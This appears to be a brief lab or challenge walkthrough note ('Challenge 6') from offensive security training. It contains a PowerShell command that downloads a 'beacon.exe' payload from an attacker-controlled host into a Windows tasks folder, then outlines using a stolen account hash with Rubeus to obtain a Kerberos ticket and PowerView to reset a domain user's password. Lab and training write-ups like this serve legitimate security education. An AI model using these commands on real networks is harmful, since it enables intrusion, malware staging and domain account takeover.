Challenge 6

cd C:/windows/tasks && powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.45.159/beacon.exe','beacon.exe')"

Already have the hash from adminWebSvc, so request a new TGT with rubeus, inject that into your session and then user PowerView Set-DomainUserPassword

Last updated